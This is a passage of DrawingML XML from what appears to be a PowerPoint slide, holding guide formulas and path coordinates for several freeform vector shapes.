                  <a:gd name="T62" fmla="*/ 178 w 646"/>
                  <a:gd name="T63" fmla="*/ 399 h 595"/>
                  <a:gd name="T64" fmla="*/ 194 w 646"/>
                  <a:gd name="T65" fmla="*/ 404 h 595"/>
                  <a:gd name="T66" fmla="*/ 210 w 646"/>
                  <a:gd name="T67" fmla="*/ 404 h 595"/>
                  <a:gd name="T68" fmla="*/ 252 w 646"/>
                  <a:gd name="T69" fmla="*/ 394 h 595"/>
                  <a:gd name="T70" fmla="*/ 598 w 646"/>
                  <a:gd name="T71" fmla="*/ 263 h 595"/>
                  <a:gd name="T72" fmla="*/ 645 w 646"/>
                  <a:gd name="T73" fmla="*/ 399 h 595"/>
                  <a:gd name="T74" fmla="*/ 121 w 646"/>
                  <a:gd name="T75" fmla="*/ 594 h 595"/>
                  <a:gd name="T76" fmla="*/ 73 w 646"/>
                  <a:gd name="T77" fmla="*/ 462 h 595"/>
                  <a:gd name="T78" fmla="*/ 136 w 646"/>
                  <a:gd name="T79" fmla="*/ 441 h 5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46" h="595">
                    <a:moveTo>
                      <a:pt x="136" y="441"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="136" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="441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8" name="Freeform 49"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7389813" y="2998788"/>
                <a:ext cx="228600" cy="114300"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 577 w 636"/>
                  <a:gd name="T1" fmla="*/ 131 h 316"/>
                  <a:gd name="T2" fmla="*/ 504 w 636"/>
                  <a:gd name="T3" fmla="*/ 152 h 316"/>
                  <a:gd name="T4" fmla="*/ 504 w 636"/>
                  <a:gd name="T5" fmla="*/ 152 h 316"/>
                  <a:gd name="T6" fmla="*/ 504 w 636"/>
                  <a:gd name="T7" fmla="*/ 152 h 316"/>
                  <a:gd name="T8" fmla="*/ 546 w 636"/>
                  <a:gd name="T9" fmla="*/ 168 h 316"/>
                  <a:gd name="T10" fmla="*/ 582 w 636"/>
                  <a:gd name="T11" fmla="*/ 184 h 316"/>
                  <a:gd name="T12" fmla="*/ 582 w 636"/>
                  <a:gd name="T13" fmla="*/ 184 h 316"/>
                  <a:gd name="T14" fmla="*/ 598 w 636"/>
                  <a:gd name="T15" fmla="*/ 200 h 316"/>
                  <a:gd name="T16" fmla="*/ 609 w 636"/>
                  <a:gd name="T17" fmla="*/ 215 h 316"/>
                  <a:gd name="T18" fmla="*/ 619 w 636"/>
                  <a:gd name="T19" fmla="*/ 231 h 316"/>
                  <a:gd name="T20" fmla="*/ 630 w 636"/>
                  <a:gd name="T21" fmla="*/ 252 h 316"/>
                  <a:gd name="T22" fmla="*/ 630 w 636"/>
                  <a:gd name="T23" fmla="*/ 252 h 316"/>
                  <a:gd name="T24" fmla="*/ 630 w 636"/>
                  <a:gd name="T25" fmla="*/ 262 h 316"/>
                  <a:gd name="T26" fmla="*/ 630 w 636"/>
                  <a:gd name="T27" fmla="*/ 262 h 316"/>
                  <a:gd name="T28" fmla="*/ 635 w 636"/>
                  <a:gd name="T29" fmla="*/ 278 h 316"/>
                  <a:gd name="T30" fmla="*/ 504 w 636"/>
                  <a:gd name="T31" fmla="*/ 315 h 316"/>
                  <a:gd name="T32" fmla="*/ 504 w 636"/>
                  <a:gd name="T33" fmla="*/ 315 h 316"/>
                  <a:gd name="T34" fmla="*/ 498 w 636"/>
                  <a:gd name="T35" fmla="*/ 294 h 316"/>
                  <a:gd name="T36" fmla="*/ 498 w 636"/>
                  <a:gd name="T37" fmla="*/ 294 h 316"/>
                  <a:gd name="T38" fmla="*/ 493 w 636"/>
                  <a:gd name="T39" fmla="*/ 273 h 316"/>
                  <a:gd name="T40" fmla="*/ 493 w 636"/>
                  <a:gd name="T41" fmla="*/ 273 h 316"/>
                  <a:gd name="T42" fmla="*/ 478 w 636"/>
                  <a:gd name="T43" fmla="*/ 236 h 316"/>
                  <a:gd name="T44" fmla="*/ 478 w 636"/>
                  <a:gd name="T45" fmla="*/ 236 h 316"/>
                  <a:gd name="T46" fmla="*/ 462 w 636"/>
                  <a:gd name="T47" fmla="*/ 221 h 316"/>
                  <a:gd name="T48" fmla="*/ 451 w 636"/>
                  <a:gd name="T49" fmla="*/ 210 h 316"/>
                  <a:gd name="T50" fmla="*/ 451 w 636"/>
                  <a:gd name="T51" fmla="*/ 210 h 316"/>
                  <a:gd name="T52" fmla="*/ 430 w 636"/>
                  <a:gd name="T53" fmla="*/ 200 h 316"/>
                  <a:gd name="T54" fmla="*/ 409 w 636"/>
                  <a:gd name="T55" fmla="*/ 194 h 316"/>
                  <a:gd name="T56" fmla="*/ 409 w 636"/>
                  <a:gd name="T57" fmla="*/ 194 h 316"/>
                  <a:gd name="T58" fmla="*/ 388 w 636"/>
                  <a:gd name="T59" fmla="*/ 194 h 316"/>
                  <a:gd name="T60" fmla="*/ 362 w 636"/>
                  <a:gd name="T61" fmla="*/ 200 h 316"/>
                  <a:gd name="T62" fmla="*/ 42 w 636"/>
                  <a:gd name="T63" fmla="*/ 294 h 316"/>
                  <a:gd name="T64" fmla="*/ 0 w 636"/>
                  <a:gd name="T65" fmla="*/ 157 h 316"/>
                  <a:gd name="T66" fmla="*/ 535 w 636"/>
                  <a:gd name="T67" fmla="*/ 0 h 316"/>
                  <a:gd name="T68" fmla="*/ 577 w 636"/>
                  <a:gd name="T69" fmla="*/ 131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36" h="316">
                    <a:moveTo>
                      <a:pt x="577" y="131"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="504" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="131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9" name="Freeform 50"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7423150" y="3103563"/>
                <a:ext cx="274638" cy="117475"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 578 w 763"/>
                  <a:gd name="T1" fmla="*/ 184 h 326"/>
                  <a:gd name="T2" fmla="*/ 37 w 763"/>
                  <a:gd name="T3" fmla="*/ 325 h 326"/>
                  <a:gd name="T4" fmla="*/ 0 w 763"/>
                  <a:gd name="T5" fmla="*/ 184 h 326"/>
                  <a:gd name="T6" fmla="*/ 541 w 763"/>
                  <a:gd name="T7" fmla="*/ 47 h 326"/>
                  <a:gd name="T8" fmla="*/ 578 w 763"/>
                  <a:gd name="T9" fmla="*/ 184 h 326"/>
                  <a:gd name="T10" fmla="*/ 762 w 763"/>
                  <a:gd name="T11" fmla="*/ 137 h 326"/>
                  <a:gd name="T12" fmla="*/ 646 w 763"/>
                  <a:gd name="T13" fmla="*/ 168 h 326"/>
                  <a:gd name="T14" fmla="*/ 609 w 763"/>
                  <a:gd name="T15" fmla="*/ 31 h 326"/>
                  <a:gd name="T16" fmla="*/ 725 w 763"/>
                  <a:gd name="T17" fmla="*/ 0 h 326"/>
                  <a:gd name="T18" fmla="*/ 762 w 763"/>
                  <a:gd name="T19" fmla="*/ 137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63" h="326">
                    <a:moveTo>
                      <a:pt x="578" y="184"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="37" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="184"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="762" y="137"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="646" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="762" y="137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0" name="Freeform 51"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7451725" y="3198813"/>
                <a:ext cx="258763" cy="147637"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 719 w 720"/>
                  <a:gd name="T1" fmla="*/ 179 h 411"/>
                  <a:gd name="T2" fmla="*/ 562 w 720"/>
                  <a:gd name="T3" fmla="*/ 210 h 411"/>
                  <a:gd name="T4" fmla="*/ 577 w 720"/>
                  <a:gd name="T5" fmla="*/ 294 h 411"/>
                  <a:gd name="T6" fmla="*/ 483 w 720"/>
                  <a:gd name="T7" fmla="*/ 310 h 411"/>
                  <a:gd name="T8" fmla="*/ 467 w 720"/>
                  <a:gd name="T9" fmla="*/ 232 h 411"/>
                  <a:gd name="T10" fmla="*/ 168 w 720"/>
                  <a:gd name="T11" fmla="*/ 294 h 411"/>
                  <a:gd name="T12" fmla="*/ 168 w 720"/>
                  <a:gd name="T13" fmla="*/ 294 h 411"/>
                  <a:gd name="T14" fmla="*/ 142 w 720"/>
                  <a:gd name="T15" fmla="*/ 300 h 411"/>
                  <a:gd name="T16" fmla="*/ 126 w 720"/>
                  <a:gd name="T17" fmla="*/ 316 h 411"/>
                  <a:gd name="T18" fmla="*/ 126 w 720"/>
                  <a:gd name="T19" fmla="*/ 316 h 411"/>
                  <a:gd name="T20" fmla="*/ 121 w 720"/>
                  <a:gd name="T21" fmla="*/ 331 h 411"/>
                  <a:gd name="T22" fmla="*/ 121 w 720"/>
                  <a:gd name="T23" fmla="*/ 357 h 411"/>
                  <a:gd name="T24" fmla="*/ 121 w 720"/>
                  <a:gd name="T25" fmla="*/ 357 h 411"/>
                  <a:gd name="T26" fmla="*/ 126 w 720"/>
                  <a:gd name="T27" fmla="*/ 373 h 411"/>
                  <a:gd name="T28" fmla="*/ 126 w 720"/>
                  <a:gd name="T29" fmla="*/ 373 h 411"/>
                  <a:gd name="T30" fmla="*/ 131 w 720"/>
                  <a:gd name="T31" fmla="*/ 389 h 411"/>
                  <a:gd name="T32" fmla="*/ 32 w 720"/>
                  <a:gd name="T33" fmla="*/ 410 h 411"/>
                  <a:gd name="T34" fmla="*/ 32 w 720"/>
                  <a:gd name="T35" fmla="*/ 410 h 411"/>
                  <a:gd name="T36" fmla="*/ 21 w 720"/>
                  <a:gd name="T37" fmla="*/ 363 h 411"/>
                  <a:gd name="T38" fmla="*/ 21 w 720"/>
                  <a:gd name="T39" fmla="*/ 363 h 411"/>
                  <a:gd name="T40" fmla="*/ 11 w 720"/>
                  <a:gd name="T41" fmla="*/ 316 h 411"/>
                  <a:gd name="T42" fmla="*/ 11 w 720"/>
                  <a:gd name="T43" fmla="*/ 316 h 411"/>
                  <a:gd name="T44" fmla="*/ 5 w 720"/>
                  <a:gd name="T45" fmla="*/ 279 h 411"/>
                  <a:gd name="T46" fmla="*/ 0 w 720"/>
                  <a:gd name="T47" fmla="*/ 247 h 411"/>
                  <a:gd name="T48" fmla="*/ 0 w 720"/>
                  <a:gd name="T49" fmla="*/ 247 h 411"/>
                  <a:gd name="T50" fmla="*/ 5 w 720"/>
                  <a:gd name="T51" fmla="*/ 226 h 411"/>
                  <a:gd name="T52" fmla="*/ 16 w 720"/>
                  <a:gd name="T53" fmla="*/ 206 h 411"/>
                  <a:gd name="T54" fmla="*/ 16 w 720"/>
                  <a:gd name="T55" fmla="*/ 206 h 411"/>
                  <a:gd name="T56" fmla="*/ 32 w 720"/>
                  <a:gd name="T57" fmla="*/ 189 h 411"/>
                  <a:gd name="T58" fmla="*/ 58 w 720"/>
                  <a:gd name="T59" fmla="*/ 179 h 411"/>
                  <a:gd name="T60" fmla="*/ 58 w 720"/>
                  <a:gd name="T61" fmla="*/ 179 h 411"/>
                  <a:gd name="T62" fmla="*/ 126 w 720"/>
                  <a:gd name="T63" fmla="*/ 158 h 411"/>
                  <a:gd name="T64" fmla="*/ 436 w 720"/>
                  <a:gd name="T65" fmla="*/ 89 h 411"/>
                  <a:gd name="T66" fmla="*/ 420 w 720"/>
                  <a:gd name="T67" fmla="*/ 22 h 411"/>
                  <a:gd name="T68" fmla="*/ 520 w 720"/>
                  <a:gd name="T69" fmla="*/ 0 h 411"/>
                  <a:gd name="T70" fmla="*/ 530 w 720"/>
                  <a:gd name="T71" fmla="*/ 69 h 411"/>
                  <a:gd name="T72" fmla="*/ 688 w 720"/>
                  <a:gd name="T73" fmla="*/ 37 h 411"/>
                  <a:gd name="T74" fmla="*/ 719 w 720"/>
                  <a:gd name="T75" fmla="*/ 179 h 4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20" h="411">
                    <a:moveTo>
                      <a:pt x="719" y="179"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="562" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="179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1" name="Freeform 52"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7402513" y="3316288"/>
                <a:ext cx="285750" cy="160337"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 110 w 793"/>
                  <a:gd name="T1" fmla="*/ 178 h 447"/>
                  <a:gd name="T2" fmla="*/ 110 w 793"/>
                  <a:gd name="T3" fmla="*/ 178 h 447"/>
                  <a:gd name="T4" fmla="*/ 120 w 793"/>
                  <a:gd name="T5" fmla="*/ 210 h 447"/>
                  <a:gd name="T6" fmla="*/ 125 w 793"/>
                  <a:gd name="T7" fmla="*/ 221 h 447"/>
                  <a:gd name="T8" fmla="*/ 136 w 793"/>
                  <a:gd name="T9" fmla="*/ 231 h 447"/>
                  <a:gd name="T10" fmla="*/ 136 w 793"/>
                  <a:gd name="T11" fmla="*/ 231 h 447"/>
                  <a:gd name="T12" fmla="*/ 162 w 793"/>
                  <a:gd name="T13" fmla="*/ 241 h 447"/>
                  <a:gd name="T14" fmla="*/ 194 w 793"/>
                  <a:gd name="T15" fmla="*/ 241 h 447"/>
                  <a:gd name="T16" fmla="*/ 724 w 793"/>
                  <a:gd name="T17" fmla="*/ 0 h 447"/>
                  <a:gd name="T18" fmla="*/ 745 w 793"/>
                  <a:gd name="T19" fmla="*/ 147 h 447"/>
                  <a:gd name="T20" fmla="*/ 378 w 793"/>
                  <a:gd name="T21" fmla="*/ 289 h 447"/>
                  <a:gd name="T22" fmla="*/ 378 w 793"/>
                  <a:gd name="T23" fmla="*/ 294 h 447"/>
                  <a:gd name="T24" fmla="*/ 771 w 793"/>
                  <a:gd name="T25" fmla="*/ 304 h 447"/>
                  <a:gd name="T26" fmla="*/ 792 w 793"/>
                  <a:gd name="T27" fmla="*/ 446 h 447"/>
                  <a:gd name="T28" fmla="*/ 257 w 793"/>
                  <a:gd name="T29" fmla="*/ 394 h 447"/>
                  <a:gd name="T30" fmla="*/ 257 w 793"/>
                  <a:gd name="T31" fmla="*/ 394 h 447"/>
                  <a:gd name="T32" fmla="*/ 194 w 793"/>
                  <a:gd name="T33" fmla="*/ 383 h 447"/>
                  <a:gd name="T34" fmla="*/ 141 w 793"/>
                  <a:gd name="T35" fmla="*/ 373 h 447"/>
                  <a:gd name="T36" fmla="*/ 141 w 793"/>
                  <a:gd name="T37" fmla="*/ 373 h 447"/>
                  <a:gd name="T38" fmla="*/ 99 w 793"/>
                  <a:gd name="T39" fmla="*/ 362 h 447"/>
                  <a:gd name="T40" fmla="*/ 68 w 793"/>
                  <a:gd name="T41" fmla="*/ 347 h 447"/>
                  <a:gd name="T42" fmla="*/ 68 w 793"/>
                  <a:gd name="T43" fmla="*/ 347 h 447"/>
                  <a:gd name="T44" fmla="*/ 47 w 793"/>
                  <a:gd name="T45" fmla="*/ 325 h 447"/>
                  <a:gd name="T46" fmla="*/ 31 w 793"/>
                  <a:gd name="T47" fmla="*/ 294 h 447"/>
                  <a:gd name="T48" fmla="*/ 31 w 793"/>
                  <a:gd name="T49" fmla="*/ 294 h 447"/>
                  <a:gd name="T50" fmla="*/ 15 w 793"/>
                  <a:gd name="T51" fmla="*/ 257 h 447"/>
                  <a:gd name="T52" fmla="*/ 10 w 793"/>
                  <a:gd name="T53" fmla="*/ 215 h 447"/>
                  <a:gd name="T54" fmla="*/ 0 w 793"/>
                  <a:gd name="T55" fmla="*/ 157 h 447"/>
                  <a:gd name="T56" fmla="*/ 104 w 793"/>
                  <a:gd name="T57" fmla="*/ 142 h 447"/>
                  <a:gd name="T58" fmla="*/ 104 w 793"/>
                  <a:gd name="T59" fmla="*/ 142 h 447"/>
                  <a:gd name="T60" fmla="*/ 110 w 793"/>
                  <a:gd name="T61" fmla="*/ 178 h 4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93" h="447">
                    <a:moveTo>
                      <a:pt x="110" y="178"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="110" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="178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00" name="Freeform 2"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="-18431" y="3524861"/>
              <a:ext cx="2201971" cy="2629523"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 819 w 6201"/>
                <a:gd name="T1" fmla="*/ 5428 h 7403"/>
                <a:gd name="T2" fmla="*/ 1821 w 6201"/>
                <a:gd name="T3" fmla="*/ 6306 h 7403"/>
                <a:gd name="T4" fmla="*/ 6200 w 6201"/>
                <a:gd name="T5" fmla="*/ 7402 h 7403"/>
                <a:gd name="T6" fmla="*/ 5181 w 6201"/>
                <a:gd name="T7" fmla="*/ 4127 h 7403"/>
                <a:gd name="T8" fmla="*/ 2693 w 6201"/>
                <a:gd name="T9" fmla="*/ 1890 h 7403"/>
                <a:gd name="T10" fmla="*/ 3748 w 6201"/>
                <a:gd name="T11" fmla="*/ 5376 h 7403"/>
                <a:gd name="T12" fmla="*/ 3265 w 6201"/>
                <a:gd name="T13" fmla="*/ 4998 h 7403"/>
                <a:gd name="T14" fmla="*/ 3853 w 6201"/>
                <a:gd name="T15" fmla="*/ 5066 h 7403"/>
                <a:gd name="T16" fmla="*/ 3832 w 6201"/>
                <a:gd name="T17" fmla="*/ 5324 h 7403"/>
                <a:gd name="T18" fmla="*/ 2567 w 6201"/>
                <a:gd name="T19" fmla="*/ 4242 h 7403"/>
                <a:gd name="T20" fmla="*/ 3260 w 6201"/>
                <a:gd name="T21" fmla="*/ 4840 h 7403"/>
                <a:gd name="T22" fmla="*/ 2687 w 6201"/>
                <a:gd name="T23" fmla="*/ 5287 h 7403"/>
                <a:gd name="T24" fmla="*/ 2430 w 6201"/>
                <a:gd name="T25" fmla="*/ 5161 h 7403"/>
